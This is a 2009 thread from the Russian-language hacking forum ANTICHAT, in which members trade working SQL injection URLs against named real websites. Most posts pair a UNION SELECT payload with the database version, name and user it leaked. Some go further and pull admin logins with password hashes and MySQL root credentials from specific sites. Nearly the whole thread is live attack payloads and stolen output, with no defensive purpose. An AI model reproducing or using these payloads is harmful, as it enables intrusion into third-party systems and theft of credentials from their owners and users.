HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.03.2009, 21:25
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.attasport.eu/ro/index.php?pg=8001&t=-31+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7


Database Version: 4.1.22-standard
Database name: attasp_bazis
User name: attasp_zootyo@localhost
 
Ответить с цитированием

  #2  
Старый 02.03.2009, 21:26
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.ultrastar.ru/?part=news&newsid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ ws(0x3a,version(),database(),user()),11,12,13--

Database Version : 5.0.41
Database name : catalog_gsm
User name : webuser@localhos


админ:

Код:
http://www.ultrastar.ru/?part=news&newsid=-1+union+select+1,2,3,4,5,6,7,8,9,concat _ws(0x3a,login,passw ord),11,12,13+from+daso_users+limit+0,1--
Код:
admin:616f658931beab92a5316727ee9b1ab8
 
Ответить с цитированием

  #3  
Старый 02.03.2009, 21:32
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.poimai.ru pr-4 ТиЦ - 230
PHP код:
http://www.poimai.ru/catalog/oruzhie/ohotnich_i_nozhi/?id=12195+union+select+1,2,3,concat_ws(0x3A,user,password,host,file_priv),5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+--+&target=nw 
root@localhost:root:2fbdcd157a5fb159:localhost:Y
 
Ответить с цитированием

  #4  
Старый 02.03.2009, 22:19
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://shintorgservis.ru/index.php?GID=1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--
Database Version : 4.0.27-log
Database name : shintorg
User name : shintorg@zvm18.host.ru


----------------------------------------------------+

Код:
http://www.pilotmaster.ru/news.php?item_id=-1+union+select+1,2,version (),4,5,6--
Database Version : 5.0.67
Database name : pilotmaster
User name : pilotmaster@localhost
 
Ответить с цитированием

  #5  
Старый 02.03.2009, 22:27
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.oxo.ro/index.php?action=levelbrowser&dir_id=-649+union+select+1,unhex(hex(concat_ws(0x3a,versio n(),database(),user()))),3,4--&SID=

Database Version: 4.1.9-standard
Database name: test1
User name: steph@localhost
 
Ответить с цитированием

  #6  
Старый 03.03.2009, 21:37
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Вот сеово небольшой сбор скулей by me
Налетай как говорица
Код:
http://www.deluthiers.com/es/category.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--
юзер/версия/бд:

Код:
4.1.22-standard:luthier_luthier@localhost:luthier_deluthiers
-----------------------------------------------------------------

Код:
http://www.educationsante.be/es/article.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7--
юзер/версия/бд:

Код:
5.0.44-log:educatio@localhost:educatio
---------------------------------------------------------------

Код:
http://www.mammaparliamodidoping.it/post.php?ID=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3--
юзер/версия/бд:


Код:
4.0.25-log:mpdd@localhost:devmpdd
-----------------------------------------------------------------

Код:
http://www.marmaglia.it/post.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7--
юзер/версия/бд:

Код:
4.1.22-standard:marmagli_user@localhost:marmagli_marmaglia
-------------------------------------------------------------------

Код:
http://www.univs.cn/univs/xidian/it/read.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5--
юзер/версия/бд:

Код:
4.0.26-log:xidian@localhost:ucnews
-------------------------------------------------------------------

Код:
http://www.maipiudivisi.it/read.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4--

юзер/версия/бд:

Код:
4.0.11a-gamma:maui@151.1.152.166:maipiudivisi
----------------------------------------------------------------


Код:
http://www.laboratorioclinicopedagogico.it/curriculum.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5--

юзер/версия/бд:

Код:
4.0.22-debug:illaboratorio@localhost:laboratorio
-------------------------------------------------------------------


Код:
http://esterproductions.it/curriculum.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database())--
юзер/версия/бд:

Код:
5.0.51a-3ubuntu5.4:ester@localhost:esterproductions_db1
----------------------------------------------------------------------


Код:
http://www.sptcomo.it/newsDetail.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
юзер/версия/бд:


Код:
4.1.22-standard:sptcoit_go38ty71@localhost:sptcoit_sf33tR3
----------------------------------------------------------------------


Код:
http://www.comune.poirino.to.it/readnews.php?id=-1+union+all+select+0,1,2,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),4,5--
юзер/версия/бд:

Код:
4.1.16-standard-log:Nick1@66.71.190.34:031492Nick
--------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #7  
Старый 02.03.2009, 22:59
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://metalmir.ru/articles/sn.php?id=-53+union+select+1,version(),3,4,5,6,7
тиц: 20
5.0.67-log

Код:
http://avtomatpro.info/articles/sn.php?id=-269+union+select+1,version(),3,4,5,6,7
тиц: 40
5.0.67-log

Код:
http://masteroff.ru/articles/sn.php?id=-120+union+select+1,version(),3,4,5,6,7
тиц: 40
5.0.67-log
 
Ответить с цитированием

  #8  
Старый 02.03.2009, 23:26
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Klarnet CMS, вроде нигде не нашел этой уязвимости, хотя это трудно назвать какой то упорядоченой CMS, скорей Klarnet framework:
PHP код:
http://www.klarnet.ru/clients/projects/?spheres_id=1+union+select+concat(0x223e3c2f613e2d2d2d3e,table_name,0x3D3E,COLUMN_NAME,0x3c62723e3c613e3c212d2d2d2d),2,3,4+from+INFORMATION_SCHEMA.COLUMNS+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)/* 
 
Ответить с цитированием

  #9  
Старый 02.03.2009, 23:39
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.lkw-neva.ru/?mode=news&id=-1+union+select+1,2,3,4,concat_ ws(0x3a,versi on(),database(),user()),6,7,8--
Database Version : 4.1.22-log
Database name : wwwlkwnevaru
User name : lkwneva@fe28.hc.ru


-------------------------------------------------------+

Код:
http://www.starcom-ru.ru/info.phtml?n_id=-1+union+select+1,2,3,4,concat_ ws(0x3a,version(),database( ),user()),6,7,8,9,10,11--&r_id=26
Database Version : 5.0.67-log
Database name : u35285
User name : u35285@10.10.10.226


админ :

Код:
http://www.starcom-ru.ru/info.phtml?n_id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,password),6,7,8,9,10,11+from+adm _users+limit+0,1--&r_id=26
Код:
star:950e35a2244603c495d408e849d3e1cf
 
Ответить с цитированием

  #10  
Старый 02.03.2009, 23:49
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://jfp.ru/articles/sn.php?id=-79+union+select+1,version(),3,4,5,6,7
5.0.67-log
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ